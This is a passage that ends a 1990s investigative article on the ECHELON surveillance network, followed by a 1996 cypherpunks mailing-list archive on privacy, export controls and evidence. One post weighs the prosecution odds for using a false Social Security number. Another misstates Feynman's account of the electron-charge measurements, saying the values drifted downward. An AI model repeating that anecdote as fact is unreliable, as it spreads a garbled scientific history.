Western allies to spy on countries throughout
the Pacific region, without the knowledge of
the New Zealand public or many of its highest
elected officials. What the NSA did not know
is that by the late 1980s, various
intelligence staff had decided these
activities had been too secret for too long,
and were providing me with interviews and
documents exposing New Zealand's intelligence
activities. Eventually, more than 50 people
who work or have worked in intelligence and
related fields agreed to be interviewed.

The activities they described made it possible
to document, from the South Pacific, some
alliance-wide systems and projects which have
been kept secret elsewhere. Of these, by far
the most important is ECHELON.

Designed and coordinated by NSA, the ECHELON
system is used to intercept ordinary e-mail,
fax, telex, and telephone communications
carried over the world's telecommunications
networks. Unlike many of the electronic spy
systems developed during the Cold War, ECHELON
is designed primarily for non-military
targets: governments, organizations,
businesses, and individuals in virtually every
country. It potentially affects every person
communicating between (and sometimes within)
countries anywhere in the world.

It is, of course, not a new idea that
intelligence organizations tap into e-mail and
other public telecommunications networks. What
was new in the material leaked by the New
Zealand intelligence staff was precise
information on where the spying is done, how
the system works, its capabilities and
shortcomings, and many details such as the
codenames.

The ECHELON system is not designed to
eavesdrop on a particular individual's e-mail
or fax link. Rather, the system works by
indiscriminately intercepting very large
quantities of communications and using
computers to identify and extract messages of
interest from the mass of unwanted ones. A
chain of secret interception facilities has
been established around the world to tap into
all the major components of the international
telecommunications networks. Some monitor
communications satellites, others land-based
communications networks, and others radio
communications. ECHELON links together all
these facilities, providing the US and its
allies with the ability to intercept a large
proportion of the communications on the
planet.

The computers at each station in the ECHELON
network automatically search through the
millions of messages intercepted for ones
containing pre-programmed keywords. Keywords
include all the names, localities, subjects,
and so on that might be mentioned. Every word
of every message intercepted at each station
gets automatically searched   whether or not a
specific telephone number or e-mail address is
on the list.

The thousands of simultaneous messages are
read in "real time" as they pour into the
station, hour after hour, day after day, as
the computer finds intelligence needles in
telecommunications haystacks.

SOMEONE IS LISTENING
The computers in stations around the globe are
known, within the network, as the ECHELON
Dictionaries. Computers that can automatically
search through traffic for keywords have
existed since at least the 1970s, but the
ECHELON system was designed by NSA to
interconnect all these computers and allow the
stations to function as components of an
integrated whole. The NSA and GCSB are bound
together under the five-nation UKUSA signals
intelligence agreement. The other three
partners   all with equally obscure names
are the Government Communications Headquarters
(GCHQ) in Britain, the Communications Security
Establishment (CSE) in Canada, and the Defense
Signals Directorate (DSD) in Australia.

The alliance, which grew from cooperative
efforts during World War II to intercept radio
transmissions, was formalized into the UKUSA
agreement in 1948 and aimed primarily against
the USSR. The five UKUSA agencies are today
the largest intelligence organizations in
their respective countries. With much of the
world's business occurring by fax, e-mail, and
phone, spying on these communications receives
the bulk of intelligence resources. For
decades before the introduction of the ECHELON
system, the UKUSA allies did intelligence
collection operations for each other, but each
agency usually processed and analyzed the
intercept from its own stations.

Under ECHELON, a particular station's
Dictionary computer contains not only its
parent agency's chosen keywords, but also has
lists entered in for other agencies. In New
Zealand's satellite interception station at
Waihopai (in the South Island), for example,
the computer has separate search lists for the
NSA, GCHQ, DSD, and CSE in addition to its own.
Whenever the Dictionary encounters a message
containing one of the agencies' keywords, it
automatically picks it and sends it directly
to the headquarters of the agency concerned.
No one in New Zealand screens, or even sees,
the intelligence collected by the New Zealand
station for the foreign agencies. Thus, the
stations of the junior UKUSA allies function
for the NSA no differently than if they were
overtly NSA-run bases located on their soil.

The first component of the ECHELON network are
stations specifically targeted on the
international telecommunications satellites
(Intelsats) used by the telephone companies of
most countries. A ring of Intelsats is
positioned around the world, stationary above
the equator, each serving as a relay station
for tens of thousands of simultaneous phone
calls, fax, and e-mail. Five UKUSA  stations
have been established to intercept the
communications carried by the Intelsats.

The British GCHQ station is located at the top
of high cliffs above the sea at Morwenstow in
Cornwall. Satellite dishes beside sprawling
operations buildings point toward Intelsats
above the Atlantic, Europe, and, inclined
almost to the horizon, the Indian Ocean. An
NSA station at Sugar Grove, located 250
kilometers southwest of Washington, DC, in the
mountains of West Virginia, covers Atlantic
Intelsats transmitting down toward North and
South America. Another NSA station is in
Washington State, 200 kilometers southwest of
Seattle, inside the Army's Yakima Firing
Center. Its satellite dishes point out toward
the Pacific Intelsats and to the east. *1

The job of intercepting Pacific Intelsat
communications that cannot be intercepted at
Yakima went to New Zealand and Australia.
Their South Pacific location helps to ensure
global interception. New Zealand provides the
station at Waihopai and Australia supplies the
Geraldton station in West Australia (which
targets both Pacific and Indian Ocean
Intelsats). *2

Each of the five stations' Dictionary
computers has a codename to distinguish it
from others in the network. The Yakima
station, for instance, located in desert
country between the Saddle Mountains and
Rattlesnake Hills, has the COWBOY Dictionary,
while the Waihopai station has the FLINTLOCK
Dictionary. These codenames are recorded at
the beginning of every intercepted message,
before it is transmitted around the ECHELON
network, allowing analysts to recognize at
which station the interception occurred.

New Zealand intelligence staff has been
closely involved with the NSA's Yakima station
since 1981, when NSA pushed the GCSB to
contribute to a project targeting Japanese
embassy communications. Since then, all five
UKUSA agencies have been responsible for
monitoring diplomatic cables from all Japanese
posts within the same segments of the globe
they are assigned for general UKUSA
monitoring.3 Until New Zealand's integration
into ECHELON with the opening of the Waihopai
station in 1989, its share of the Japanese
communications was intercepted at Yakima and
sent unprocessed to the GCSB headquarters in
Wellington for decryption, translation, and
writing into UKUSA-format intelligence reports
(the NSA provides the codebreaking programs).

"COMMUNICATION" THROUGH SATELLITES
The next component of the ECHELON system
intercepts a range of satellite communications
not carried by Intelsat.In addition to the
UKUSA stations targeting Intelsat satellites,
there are another five or more stations homing
in on Russian and other regional
communications satellites. These stations are
Menwith Hill in northern England; Shoal Bay,
outside Darwin in northern Australia (which
targets Indonesian satellites); Leitrim, just
south of Ottawa in Canada (which appears to
intercept Latin American satellites); Bad
Aibling in Germany; and Misawa in northern
Japan.

A group of  facilities that tap directly into
land-based telecommunications systems is the
final element of the ECHELON system. Besides
satellite and radio, the other main method of
transmitting large quantities of public,
business, and government communications is a
combination of water cables under the oceans
and microwave networks over land. Heavy
cables, laid across seabeds between countries,
account for much of the world's international
communications. After they come out of the
water and join land-based microwave networks
they are very vulnerable to interception. The
microwave networks are made up of chains of
microwave towers relaying messages from
hilltop to hilltop (always in line of sight)
across the countryside. These networks shunt
large quantities of communications across a
country. Interception of them gives access to
international undersea communications (once
they surface) and to international
communication trunk lines across continents.
They are also an obvious target for
large-scale interception of domestic
communications.

Because the facilities required to intercept
radio and satellite communications use large
aerials and dishes that are difficult to hide
for too long, that network is reasonably well
documented. But all that is required to
intercept land-based communication networks is
a building situated along the microwave route
or a hidden cable running underground from the
legitimate network into some anonymous
building, possibly far removed. Although it
sounds technically very difficult, microwave
interception from space by United States spy
satellites also occurs.4 The worldwide network
of facilities to intercept these
communications is largely undocumented, and
because New Zealand's GCSB does not
participate in this type of interception, my
inside sources could not help either.

NO ONE IS SAFE FROM A MICROWAVE
A 1994 expos of the Canadian UKUSA agency,
Spyworld, co-authored by one of its former
staff, Mike Frost, gave the first insights
into how a lot of foreign microwave
interception is done (see p. 18). It described
UKUSA "embassy collection" operations, where
sophisticated receivers and processors are
secretly transported to their countries'
overseas embassies in diplomatic bags and used
to monitor various communications in foreign
capitals. *5

Since most countries' microwave networks
converge on the capital city, embassy
buildings can be an ideal site. Protected by
diplomatic privilege, they allow interception
in the heart of the target country. *6 The
Canadian embassy collection was requested by
the NSA to fill gaps in the American and
British embassy collection operations, which
were still occurring in many capitals around
the world when Frost left the CSE in 1990.
Separate sources in Australia have revealed
that the DSD also engages in embassy
collection. *7 On the territory of UKUSA
nations, the interception of land-based
telecommunications appears to be done at
special secret intelligence facilities. The
US, UK, and Canada are geographically well
placed to intercept the large amounts of the
world's communications that cross their
territories.

The only public reference to the Dictionary
system anywhere in the world was in relation
to one of these facilities, run by the GCHQ in
central London. In 1991, a former British GCHQ
official spoke anonymously to Granada
Television's World in Action about the
agency's abuses of power. He told the program
about an anonymous red brick building at 8
Palmer Street where GCHQ secretly intercepts
every telex which passes into, out of, or
through London, feeding them into powerful
computers with a program known as
"Dictionary." The operation, he explained, is
staffed by carefully vetted British Telecom
people: "It's nothing to do with national
security. It's because it's not legal to take
every single telex. And they take everything:
the embassies, all the business deals, even
the birthday greetings, they take everything.
They feed it into the Dictionary." *8 What the
documentary did not reveal is that Dictionary
is not just a British system; it is
UKUSA-wide.

Similarly, British researcher Duncan Campbell
has described how the US Menwith Hill station
in Britain taps directly into the British
Telecom microwave network, which has actually
been designed with several major microwave
links converging on an isolated tower
connected underground into the station.9

The NSA Menwith Hill station, with 22
satellite terminals and more than 4.9 acres of
buildings, is undoubtedly the largest and most
powerful in the UKUSA network. Located in
northern England, several thousand kilometers
from the Persian Gulf, it was awarded the
NSA's "Station of the Year" prize for 1991
after its role in the Gulf War. Menwith Hill
assists in the interception of microwave
communications in another way as well, by
serving as a ground station for US electronic
spy satellites. These intercept microwave
trunk lines and short range communications
such as military radios and walkie talkies.
Other ground stations where the satellites'
information is fed into the global network are
Pine Gap, run by the CIA near Alice Springs in
central Australia and the Bad Aibling station
in Germany. *10 Among them, the various
stations and operations making up the ECHELON
network tap into all the main components of
the world's telecommunications networks. All
of them, including a separate network of
stations that intercepts long distance radio
communications, have their own Dictionary
computers connected into ECHELON.

In the early 1990s, opponents of the Menwith
Hill station obtained large quantities of
internal documents from the facility. Among
the papers was a reference to an NSA computer
system called Platform. The integration of all
the UKUSA station computers into ECHELON
probably occurred with the introduction of
this system in the early 1980s. James Bamford
wrote at that time about a new worldwide NSA
computer network codenamed Platform "which
will tie together 52 separate computer systems
used throughout the world. Focal point, or
`host environment,' for the massive network
will be the NSA headquarters at Fort Meade.
Among those included in Platform will be the
British SIGINT organization, GCHQ." *11

LOOKING IN THE DICTIONARY
The Dictionary computers are connected via
highly encrypted UKUSA communications that
link back to computer data bases in the five
agency headquarters. This is where all the
intercepted messages selected by the
Dictionaries end up. Each morning the
specially "indoctrinated" signals intelligence
analysts in Washington, Ottawa,Cheltenham,
Canberra, and Wellington log on at their
computer terminals and enter the Dictionary
system. After keying in their security
passwords, they reach a directory that lists
the different categories of intercept
available in the data bases, each with a
four-digit code. For instance, 1911 might be
Japanese diplomatic cables from Latin America
(handled by the Canadian CSE), 3848 might be
political communications from and about
Nigeria, and 8182 might be any messages about
distribution of encryption technology.

They select their subject category, get a
"search result" showing how many messages have
been caught in the ECHELON net on that
subject, and then the day's work begins.
Analysts scroll through screen after screen of
intercepted faxes, e-mail messages, etc. and,
whenever a message appears worth reporting on,
they select it from the rest to work on. If it
is not in English, it is translated and then
written into the standard format of
intelligence reports produced anywhere within
the UKUSA network   either in entirety as a
"report," or as a summary or "gist."

INFORMATION CONTROL
A highly organized system has been developed
to control what is being searched for by each
station and who can have access to it. This is
at the heart of ECHELON operations and works
as follows.

The individual station's Dictionary computers
do not simply have a long list of keywords to
search for. And they do not send all the
information into some huge database that
participating agencies can dip into as they
wish. It is much more controlled.

The search lists are organized into the same
categories, referred to by the four digit
numbers. Each agency decides its own
categories according to its responsibilities
for producing intelligence for the network.
For GCSB, this means South Pacific
governments, Japanese diplomatic, Russian
Antarctic activities, and so on.

The agency then works out about 10 to 50
keywords for selection in each category. The
keywords include such things as names of
people, ships, organizations, country names,
and subject names. They also include the known
telex and fax numbers and Internet addresses
of any individuals, businesses, organizations,
and government offices that are targets. These
are generally written as part of the message
text and so are easily recognized by the
Dictionary computers.

The agencies also specify combinations of
keywords to help sift out communications of
interest. For example, they might search for
diplomatic cables containing both the words
"Santiago" and "aid," or cables containing the
word "Santiago" but not "consul" (to avoid the
masses of routine consular communications). It
is these sets of words and numbers (and
combinations), under a particular category,
that get placed in the Dictionary computers.
(Staff in the five agencies called Dictionary
Managers enter and update the keyword search
lists for each agency.)

The whole system, devised by the NSA, has been
adopted completely by the other agencies. The
Dictionary computers search through all the
incoming messages and, whenever they encounter
one with any of the agencies' keywords, they
select it. At the same time, the computer
automatically notes technical details such as
the time and place of interception on the
piece of intercept so that analysts reading
it, in whichever agency it is going to, know
where it came from, and what it is. Finally,
the computer writes the four-digit code (for
the category with the keywords in that
message) at the bottom of the message's text.
This is important. It means that when all the
intercepted messages end up together in the
database at one of the agency headquarters,
the messages on a particular subject can be
located again. Later, when the analyst using
the Dictionary system selects the four- digit
code for the category he or she wants, the
computer simply searches through all the
messages in the database for the ones which
have been tagged with that number.

This system is very effective for controlling
which agencies can get what from the global
network because each agency only gets the
intelligence out of the ECHELON system from
its own numbers. It does not have any access
to the raw intelligence coming out of the
system to the other agencies. For example,
although most of the GCSB's intelligence
production is primarily to serve the UKUSA
alliance, New Zealand does not have access to
the whole ECHELON network. The access it does
have is strictly controlled. A New Zealand
intelligence officer explained: "The agencies
can all apply for numbers on each other's
Dictionaries. The hardest to deal with are the
Americans. ... [There are] more hoops to jump
through, unless it is in their interest, in
which case they'll do it for you."

There is only one agency which, by virtue of
its size and role within the alliance, will
have access to the full potential of the
ECHELON system   the agency that set it up.
What is the system used for? Anyone listening
to official "discussion" of intelligence could
be forgiven for thinking that, since the end
of the Cold War, the key targets of the
massive UKUSA intelligence machine are
terrorism, weapons proliferation, and economic
intelligence. The idea that economic
intelligence has become very important, in
particular, has been carefully cultivated by
intelligence agencies intent on preserving
their post-Cold War budgets. It has become an
article of faith in much discussion of
intelligence. However, I have found no
evidence that these are now the primary
concerns of organizations such as NSA.

QUICKER INTELLIGENCE,SAME MISSION
A different story emerges after examining very
detailed information I have been given about
the intelligence New Zealand collects for the
UKUSA allies and detailed descriptions of what
is in the yards-deep intelligence reports New
Zealand receives from its four allies each
week. There is quite a lot of intelligence
collected about potential terrorists, and
there is quite a lot of economic intelligence,
notably intensive monitoring of all the
countries participating in GATT negotiations.
But by far, the main priorities of the
intelligence alliance continue to be political
and military intelligence to assist the larger
allies to pursue their interests around the
world. Anyone and anything the particular
governments are concerned about can become a
target.

With capabilities so secret and so powerful,
almost anything goes. For example, in June
1992, a group of current "highly placed
intelligence operatives" from the British GCHQ
spoke to the London Observer: "We feel we can
no longer remain silent regarding that which
we regard to be gross malpractice and
negligence within the establishment in which
we operate." They gave as examples GCHQ
interception of three charitable
organizations, including Amnesty International
and Christian Aid. As the Observer reported:
"At any time GCHQ is able to home in on their
communications for a routine target request,"
the GCHQ source said. In the case of phone
taps the procedure is known as Mantis. With
telexes it is called Mayfly. By keying in a
code relating to Third World aid, the source
was able to demonstrate telex "fixes" on the
three organizations. "It is then possible to
key in a trigger word which enables us to home
in on the telex communications whenever that
word appears," he said. "And we can read a
pre-determined number of characters either
side of the keyword."12 Without actually
naming it, this was a fairly precise
description of how the ECHELON Dictionary
system works. Again, what was not revealed in
the publicity was that this is a UKUSA-wide
system. The design of ECHELON means that the
interception of these organizations could have
occurred anywhere in the network, at any
station where the GCHQ had requested that the
four-digit code covering Third World aid be
placed.

Note that these GCHQ officers mentioned that
the system was being used for telephone calls.
In New Zealand, ECHELON is used only to
intercept written communications: fax, e-mail,
and telex. The reason, according to
intelligence staff, is that the agency does
not have the staff to analyze large quantities
of telephone conversations.

Mike Frost's expos of Canadian "embassy
collection" operations described the NSA
computers they used, called Oratory, that can
"listen" to telephone calls and recognize when
keywords are spoken. Just as we can recognize
words spoken in all the different tones and
accents we encounter, so too, according to
Frost, can these computers. Telephone calls
containing keywords are automatically
extracted from the masses of other calls and
recorded digitally on magnetic tapes for
analysts back at agency headquarters. However,
high volume voice recognition computers will
be technically difficult to perfect, and my
New Zealand-based sources could not confirm
that this capability exists. But, if or when
it is perfected, the implications would be
immense. It would mean that the UKUSA agencies
could use machines to search through all the
international telephone calls in the world, in
the same way that they do written messages. If
this equipment exists for use in embassy
collection, it will presumably be used in all
the stations throughout the ECHELON network.
It is yet to be confirmed how extensively
telephone communications are being targeted by
the ECHELON stations for the other agencies.

The easiest pickings for the ECHELON system
are the individuals, organizations,and
governments that do not use encryption. In New
Zealand's area, for example, it has proved
especially useful against already vulnerable
South Pacific nations which do not use any
coding, even for government communications
(all these communications of New Zealand's
neighbors are supplied, unscreened, to its
UKUSA allies). As a result of the revelations
in my book, there is currently a project under
way in the Pacific to promote and supply
publicly available encryption software to
vulnerable organizations such as democracy
movements in countries with repressive
governments. This is one practical way of
curbing illegitimate uses of the ECHELON
capabilities.

One final comment. All the newspapers,
commentators, and "well placed sources" told
the public that New Zealand was cut off from
US intelligence in the mid-1980s. That was
entirely untrue. The intelligence supply to
New Zealand did not stop, and instead, the
decade since has been a period of increased
integration of New Zealand into the US system.
Virtually everything   the equipment, manuals,
ways of operating, jargon, codes, and so on,
used in the GCSB   continues to be imported
entirely from the larger allies (in practice,
usually the NSA). As with the Australian and
Canadian agencies, most of the priorities
continue to come from the US, too.

The main thing that protects these agencies
from change is their secrecy. On the day my
book arrived in the book shops, without prior
publicity, there was an all-day meeting of the
intelligence bureaucrats in the prime
minister's department trying to decide if they
could prevent it from being distributed. They
eventually concluded, sensibly, that the
political costs were too high. It is
understandable that they were so agitated.

Throughout my research, I have faced official
denials or governments refusing to comment on
publicity about intelligence activities. Given
the pervasive atmosphere of secrecy and
stonewalling, it is always hard for the public
to judge what is fact, what is speculation,
and what is paranoia. Thus, in uncovering New
Zealand's role in the NSA-led alliance, my aim
was to provide so much detail about the
operations   the technical systems, the daily
work of individual staff members, and even the
rooms in which they work inside intelligence
facilities   that readers could feel confident
that they were getting close to the truth. I
hope the information leaked by intelligence
staff in New Zealand about UKUSA and its
systems such as ECHELON  will help lead to
change. n

CAQ SUBSCRIPTION INFORMATION
CAQ (CovertAction Quarterly) has won numerous
awards for investigative journalism. In 1996, it won 4
of "Project Censored" top 25 awards for investigative
reporting. CAQ is read around the world by
investigative reporters, activists, scholars,
intelligence buffs, news junkies,
and anyone who wants to know the news and
analysis behind the soundbites and headlines.
Recommended by Noam Chomsky;
targeted by the CIA.

Each article in the 64-page magazine, which is in its
19th year of publication, is extensively footnoted and
accompanied by photographs and graphics.

For a single issue, send $6.
 A one year subscription:
 US $22;
 Canada/Mexico $27;
 Latin America/Europe $33;
 Other areas $35.
A two year US subscription is $38

 Please send check or money order in $US to:
 CAQ
 1500 Massachusetts Ave. #732
 Washington, DC 20005, USA

Mail, phone or fax Mastercard or Visa with

address info and expiration date
Phone: 202-331-9763
Fax: 202-331-9751
E-mail: caq@igc.org

CHECK OUT OUR WEB SITES:
http://mediafilter.org/caq
http://www.worldmedia.com/caq

** End of text from cdp:covertaction **

***************************************************************************
This material came from PeaceNet, a non-profit progressive networking
service.  For more information, send a message to peacenet-info@igc.apc.org
***************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 13 Dec 1996 15:10:33 -0800 (PST)
To: aaron@herringn.com
Subject: Re: [Privacy] Airline background checks...
Message-ID: <v02140b05aed7858a161c@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>WASHINGTON (CNN) -- Under plans to overhaul the airline security system,
>making a plane reservation would trigger an instant profile of a
>passenger's background, including past travels and possible criminal
>history information.
>
>[...]
>
>Government should pay
>
[snip]
>"It's not an airline or airport problem. It's a national security problem,"
>Lally said. "Airports and airlines are surrogate targets. The real targets
>are the policies and government of the United States."
>

For those of you not aware of airport procedures, the real terrorism
threats are not only from ground personnel but those impersonating LEOs
(Law Enforcement Officers).  Fake badges are easy to come by and by filling
in a form anyone can get on board an airline with their firearm.  No
procedures are currently in place to allow airline or airport security
personnel to easily and positively identify bogus LEOs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Fri, 13 Dec 1996 15:23:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: In Defense of Anecdotal Evidence
Message-ID: <199612132316.PAA17263@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain



At 9:54 AM 12/13/1996, Rob Carlson wrote:
>This doesn't make studies or statistical evidence true. Just more
>reliable than anecdotal evidence. Humans who will lie about their
>observations will also produce flawed studies. Again the former
>(anecdotal) is unverifiable, but I can check the latter (statistical)
>independently.

One other point I forgot to make:

It is expensive to verify a long statistical study.  Not only does it
require extensive knowledge of statistics, but you may actually need
to reproduce much of the work.  The only people who can afford to pay
for such verification work may not be the same people that I would
trust.

Anecdotal evidence is inexpensive to collect.  In many circumstances
the cost benefit analysis favors it.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 13 Dec 1996 15:26:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Social Security Fraud
Message-ID: <199612132326.PAA26492@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 1:15 AM 12/13/1996, Huge Cajones Remailer wrote:
>>What laws would an employee violate?  What are the chances of
>>conviction?  What are the likely penalties if convicted?
>
> ...upon conviction thereof, be fined not more than $1,000, or
>imprisoned not more than 1 year, or both."

Ouch!

>.. . shall be guilty of a felony and upon conviction thereof shall be
>fined under title 18 or imprisoned for not more than five years, or
>both."

Yikes!

Thanks to Catfish Friend for the fine research work.

So how often are people prosecuted under these laws?  That is, if you
pay your taxes and don't steal from people, but do give your employer
the wrong SS number, what are the odds that you will be prosecuted?

If prosecuted, are the odds high that you will receive jail time?
Assume a good lawyer, spotless criminal record, and a favored
racial class.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 13 Dec 1996 15:35:13 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Is This for Real?
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961213233518Z-34038@INET-01-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Can you trust anecdotal evidence?  

	Are the statisticians lying, 
	are the marketeers just keeping you entranced; 
	do covert agencies send 
	     electromagnet currents through your body, 
	are blatant, secret plots against your privacy 
	     in place?

Stay tuned for the latest update from . . .

	P s y c h o P u n k s ! *


Yikes - now we need a discussion on teleology & epistemology.

   ..
Blanc
* (just kidding.  It's Friday afternoon)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 13 Dec 1996 13:46:48 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: your mail
In-Reply-To: <199612130915.BAA13307@mailmasher.com>
Message-ID: <199612132143.PAA19967@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Huge Cajones Remailer wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - -- Catfish Friend 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMrEM89GzuQsii+JdAQHc8wP/cKizciQHtI3ue/CdKJ62DbuPVlobRTl5
> qY1oOQs3L3rb0mKa0FdklcfxaXYYMY0zJpGmGTSynDwJKGSCm5O6fPkCPG064LSp
> npMzmOqOWpUSrYX652Q8EMFPODHKCl0FX78ksQ1ns8Xv//bT4wdPt5GR6AlTrvdc
> XH1s/oB9tMM=
> =2xtm
> -----END PGP SIGNATURE-----
> --
> Greg Broiles                | US crypto export control policy in a nutshell:
> gbroiles@netbox.com         | 
> http://www.io.com/~gbroiles | Export jobs, not crypto.
>                             | 
> 

:-(

Does anyone have any suggestions (checklists of things to do, etc.) 
for people who are afraid of accidentally disclosing their anonymous 
identities? It seems to be a common problem that anonymity is violated
because people simply screw up with their remailing software.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Fri, 13 Dec 1996 13:06:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects
In-Reply-To: <199612131507.KAA27336@homeport.org>
Message-ID: <0mgQIf600YUq02IaY0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack <adam@homeport.org> writes:
> I cross posted the ITAR proposed rev pointers to Firewalls.  In
> addition to an entertaining rant, Marcus posted this:
> 
> ----- Forwarded message from Marcus J. Ranum -----
> 
> From mjr@mail.clark.net  Thu Dec 12 17:38:57 1996
> Message-Id: <199612122240.RAA10556@mail.clark.net>
> Comments: Authenticated sender is <mjr@mail.clark.net.>
> From: "Marcus J. Ranum" <mjr@mail.clark.net>
> Organization: V-ONE Corp Baltimore office
> To: adam@homeport.org
> Date: Thu, 12 Dec 1996 17:42:00 +0000
> Subject: that doc....
> Priority: normal
> X-mailer: Pegasus Mail for Win32 (v2.42a)
> 
> 
> You posted a pointer to that document. It was quite interesting.
> I see that the feds are making INDIVIDUALS responsible for
> ENFORCING export laws!!!  Read carefully:

<snip excerpt>

> This implies that putting something up for FTP == export. Holy
> shit.

This has always been the case. At this point, it is sufficient to make
the downlaoder promise that they are a US citizen-unit (eg the mit pgp
dist.). Of course, seeing as how no congressional laws involved, the
ores. could decide that that's not good enough on a whim.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMrHFJ8kz/YzIV3P5AQE/EgMAuoWyNti9XqXfEGCOCIFHXR7fIPiCJJx1
tbYCGeZlBvIkwopHvGLWpR5AdTSC1/loleWbOCP0hBL13+lVLTtMPaA4OcCBnY34
z75eLpbPUibUxCX+uaLhFAkQF1i0W8Zz
=G2HV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 13 Dec 1996 16:45:08 -0800 (PST)
To: nobody@cypherpunks.ca
Subject: Re: Wired Integrity
In-Reply-To: <199612132111.NAA14618@cypherpunks.ca>
Message-ID: <Pine.SUN.3.91.961213161741.19146B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 13 Dec 1996 nobody@cypherpunks.ca wrote:

> The latest issue of Wired has a nice article about Sameer Parekh
> and C2Net.
> 
> What is troubling is that it is written by Sandy Sandfort who
> works at C2Net.  There is no indication of this in the vicinity
> of the Wired article.

The piece was commissioned in early summer.  It was originally
slated to run in the fall.  For one reason or another it kept
getting pushed back and only just not made it to the light of
day.

Att the time I wrote and submitted the article I neither worked 
for Sameer, nor had I applied for a position, nor was I being 
considered for one (at least, not to my knowledge).  When I went 
to work for Sameer, but before the article was published, I 
informed my editor of the possible APPEARANCE of a conflict of 
interest.  He did not have a problem with it.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 13 Dec 1996 16:43:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Is This for Real?
Message-ID: <199612140035.QAA07577@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 3:35 PM 12/13/1996, Blanc Weber wrote:
>Can you trust anecdotal evidence?  
>
>        Are the statisticians lying, 
>        are the marketeers just keeping you entranced; 
>        do covert agencies send 
>             electromagnet currents through your body, 
>        are blatant, secret plots against your privacy 
>             in place?
>
>Stay tuned for the latest update from . . .
>
>        P s y c h o P u n k s ! *
>
>
>Yikes - now we need a discussion on teleology & epistemology.
>
>   ..
>Blanc
>* (just kidding.  It's Friday afternoon)

It's not the Cypherpunks that are crazy - it's the world! ;-)

Perhaps an example will be persuasive.  Richard Feynman had some
interesting things to say about the history of measured charge of the
electron.  If you look at a graph of the "official" value over time
you will find that it drifts downwards to the correct value, or at any
rate the value which is universally accepted today.

If the charge on the electron has been constant this century - and
that seems safe - you would have expected the results of each
successive study to be scattered around the actual value.  Instead,
they start out a little below Milliken's original value and steadily
move downward.  The most likely explanation is that the experimenters
did not want to seem too far out in their results and fudged them.
(This is Feynman's explanation.)

The charge of the electron is verifiable "hard" science to a degree
the social sciences cannot even dream of approaching, and yet we find
that the "professionals" were fudging their results.  Not just one or
two, but a whole flock of them working independently.

The charge of the electron is hard for people to get worked up over.
It has no political relevance.  There is no real reason to boost its
value.  The social sciences, however, are political in the extreme.
Aside from issues of anticipated future earnings (or even employment),
many social scientists have strong political beliefs which motivate
their work.  Given that their studies are often not reproduced - one
study can take many years to complete - and that they contradict each
other when they are reproduced, I do not feel unlimited confidence in
their conclusions.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Fri, 13 Dec 1996 17:52:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Wired Integrity
Message-ID: <199612140137.RAA20020@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain



At 4:35 PM 12/13/1996, Sandy Sandfort wrote:
>> What is troubling is that it is written by Sandy Sandfort who
>> works at C2Net....
>
>...At the time I wrote and submitted the article I neither worked 
>for Sameer...

Thank you for the clear explanation.

Just so you know, I did not doubt your integrity for an instant.

Wired should have appended a short paragraph explaining the possible
conflict of interest.

The Little Green Man






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 13 Dec 1996 18:31:07 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Is This for Real?
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961214023128Z-34709@INET-01-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	nobody@huge.cajones.com/aka Red Rackham

It's not the Cypherpunks that are crazy - it's the world! ;-)
........................................................


